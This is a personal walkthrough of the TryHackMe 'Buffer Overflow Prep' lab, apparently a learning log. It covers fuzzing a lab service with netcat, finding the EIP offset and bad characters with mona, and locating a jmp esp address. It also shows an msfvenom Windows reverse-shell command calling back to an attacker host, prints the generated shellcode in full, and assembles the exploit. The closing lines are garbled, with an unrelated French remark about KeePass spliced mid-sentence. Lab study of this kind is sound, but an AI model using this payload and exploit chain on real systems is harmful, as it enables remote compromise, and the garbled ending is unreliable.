Buffer Overflow Prep 1

  1. Prereq
  2. OVERFLOW 1
    1. Find where it’s crashing
    2. Inject the pattern
  3. Finding Bad Characters
    1. Error
  4. Find the jump point
  5. Generate Payload.
  6. Prepend NOPs
  7. Preparing the Exploit
    1. EIP
    2. ESP
    3. EBP

https://tryhackme.com/room/bufferoverflowprep

Prereq

You have to start the server with the debugger.
Then listen with netcat.

You should have something like that:

OVERFLOW 1

Find where it’s crashing

He ask us to use he fuzzer to find where it’s crashing.
I wand to do it myself to learn.

nc 10.10.5.89 1337 <<< "OVERFLOW1 "$(python -c 'print("A"*100)') 

It’s crashing between 1500 and 2000.

Between 1970 and 1990

At 1972 it’s ok, at 1973 it’s crashing.

Inject the pattern

In the fuzzer it’s incrementing by 100, so I don’t have to be so precise.
The server crash at 1973, let’s create a string of 2000

Now let’s find the offset with mona:
!mona findmsp -distance 2000

The EIP patternt is at 1978.
So I have to sent the prefix “OVERFLOW1 “ + 1978 letters A + few letters B.

nc -q 1 10.10.5.89 1337 <<< "OVERFLOW1 "$(python -c 'print("A"*1978)')"BBBB"

BBBB = 42424242

Finding Bad Characters

We have to do `!mona bytearray -b “\x00”:

Let’s do the same in bash.

i=1
string=""
while [ $i != 256 ]
do
	x=`printf "%02x\n" $i`
	string="${string}\x${x}"
	i=$((i+1))
done
echo $string

I have to send the bytearray.

nc -q 1 10.10.5.89 1337 <<< "OVERFLOW1 "$(python -c 'print("A"*1978)')"BBBB\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

And create it with mona too:

!mona bytearray -b "\x00"

Now compare with the ESP rgister point:

I’m gonna do a little test, let’s see what append if I remove 2 B from the payload.

2 chars is missing in the ASCII part, the \x

!mona compare -f C:\mona\oscp\bytearray.bin -a esp

Error

It’s not working because he interpret my hex code as ASCII.

So I’m gonna input the payload in the python command only.

nc -q 1 10.10.5.89 1337 <<< "OVERFLOW1 "$(python -c 'print("A"*1978 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')

Better

!mona compare -f C:\mona\oscp\bytearray.bin -a esp

I have an another problem:

The 4 first bad chars are normal but the others are not, the EIP dsplay 42424242 so it should be good, and it’s not a problem of encoding because I have the 4 first bad chars.

I will remove \x07\x08 and \x2e\x2f from my payload and mona.

!mona bytearray -b "\x00\x07\x08\x2e\x2f"

The problem still here.

Why this one is not at c2 ?
Where is a0 ? If we add a0 to the string and it should be good.

\x00\x07\x08\x2e\x2f\xa0

And no, it’s not good, because for exemple \x07\x08:
The \x07 is the bad character but the \x08 is corrupted

\x00\x07\x2e\xa0

It was super hard at the end, Try hack me does not explain this.

Find the jump point

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

This command finds all “jmp esp” (or equivalent) instructions with addresses that don’t contain any of the badchars specified.
So that’s where I can inject a shellcode without badchars.
We need to convert it in little indian.
You need to inverse the Bytes.
So 625011af = \xaf\x11\x50\x62
It will be our jmp.

Generate Payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

shellcode += "\xba\x17\x58\xc7\x1e\xda\xd5\xd9\x74\x24\xf4\x5e\x31\xc9"
shellcode += "\xb1\x52\x83\xee\xfc\x31\x56\x0e\x03\x41\x56\x25\xeb\x91"
shellcode += "\x8e\x2b\x14\x69\x4f\x4c\x9c\x8c\x7e\x4c\xfa\xc5\xd1\x7c"
shellcode += "\x88\x8b\xdd\xf7\xdc\x3f\x55\x75\xc9\x30\xde\x30\x2f\x7f"
shellcode += "\xdf\x69\x13\x1e\x63\x70\x40\xc0\x5a\xbb\x95\x01\x9a\xa6"
shellcode += "\x54\x53\x73\xac\xcb\x43\xf0\xf8\xd7\xe8\x4a\xec\x5f\x0d"
shellcode += "\x1a\x0f\x71\x80\x10\x56\x51\x23\xf4\xe2\xd8\x3b\x19\xce"
shellcode += "\x93\xb0\xe9\xa4\x25\x10\x20\x44\x89\x5d\x8c\xb7\xd3\x9a"
shellcode += "\x2b\x28\xa6\xd2\x4f\xd5\xb1\x21\x2d\x01\x37\xb1\x95\xc2"
shellcode += "\xef\x1d\x27\x06\x69\xd6\x2b\xe3\xfd\xb0\x2f\xf2\xd2\xcb"
shellcode += "\x54\x7f\xd5\x1b\xdd\x3b\xf2\xbf\x85\x98\x9b\xe6\x63\x4e"
shellcode += "\xa3\xf8\xcb\x2f\x01\x73\xe1\x24\x38\xde\x6e\x88\x71\xe0"
shellcode += "\x6e\x86\x02\x93\x5c\x09\xb9\x3b\xed\xc2\x67\xbc\x12\xf9"
shellcode += "\xd0\x52\xed\x02\x21\x7b\x2a\x56\x71\x13\x9b\xd7\x1a\xe3"
shellcode += "\x24\x02\x8c\xb3\x8a\xfd\x6d\x63\x6b\xae\x05\x69\x64\x91"
shellcode += "\x36\x92\xae\xba\xdd\x69\x39\xcf\x29\x43\x1e\xa7\x2b\xa3"
shellcode += "\x72\xc8\xa5\x45\x18\x38\xe0\xde\xb5\xa1\xa9\x94\x24\x2d"
shellcode += "\x64\xd1\x67\xa5\x8b\x26\x29\x4e\xe1\x34\xde\xbe\xbc\x66"
shellcode += "\x49\xc0\x6a\x0e\x15\x53\xf1\xce\x50\x48\xae\x99\x35\xbe"
shellcode += "\xa7\x4f\xa8\x99\x11\x6d\x31\x7f\x59\x35\xee\xbc\x64\xb4"
shellcode += "\x63\xf8\x42\xa6\xbd\x01\xcf\x92\x11\x54\x99\x4c\xd4\x0e"
shellcode += "\x6b\x26\x8e\xfd\x25\xae\x57\xce\xf5\xa8\x57\x1b\x80\x54"
shellcode += "\xe9\xf2\xd5\x6b\xc6\x92\xd1\x14\x3a\x03\x1d\xcf\xfe\x23"
shellcode += "\xfc\xc5\x0a\xcc\x59\x8c\xb6\x91\x59\x7b\xf4\xaf\xd9\x89"
shellcode += "\x85\x4b\xc1\xf8\x80\x10\x45\x11\xf9\x09\x20\x15\xae\x2a"
shellcode += "\x61"

Prepend NOPs

That’s something uou have to add befor the payload to let some space for the payload to unpack.

padding = "\x90" * 16

Preparing the Exploit

command = "OVERFLOW "
offset = 1978*"A"
jmp = "\xaf\x11\x50\x62"
nops = 16*"\x90"
shellcode = $(msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c)


string = command + offset + jmp + nops + shellcode

Instead of the variable jmp we had BBBB who was in the EIP
Then we put the nops to let the payload unpack

EIP

EIP stands for “Extended Instruction Pointer” and it is a 32-bit register that points to the memory address of the next instruction to be executed. As a program runs, EIP is updated to point to the next instruction in memory.

So in our case the next instruction would be the jmp

ESP

ESP stands for “Extended Stack Pointer” and it is a 32-bit register that points to the top of the stack. The stack is a portion of memory used to store local variables and function call data. As data is pushed onto the stack, ESP is decremented to point to the new top of the stack. As data is popped off the stack, ESP is incremented to point to the new top of the stack.

EBP

EBP stands for “Extended Base Pointer” and it is a 32-bit register that is used as a reference point for accessing function parameters and local variables stored on the stack. When a function is called, the value of ESP is saved in EBP, and the stack is used to store the function’s local variables and parameters. EBP is used as a reference point to access this data on the stack.

https://www.uperesia.com/buffer-overflow-explained

I’ah oui ok, si tu as keepass 2 c’est la même format, si tu as keepass 1 il faut migrerve learned a lot but it’s not working, even with a script on github:
https://github.com/joshua17sc/Buffer-Overflows/blob/main/exploit.py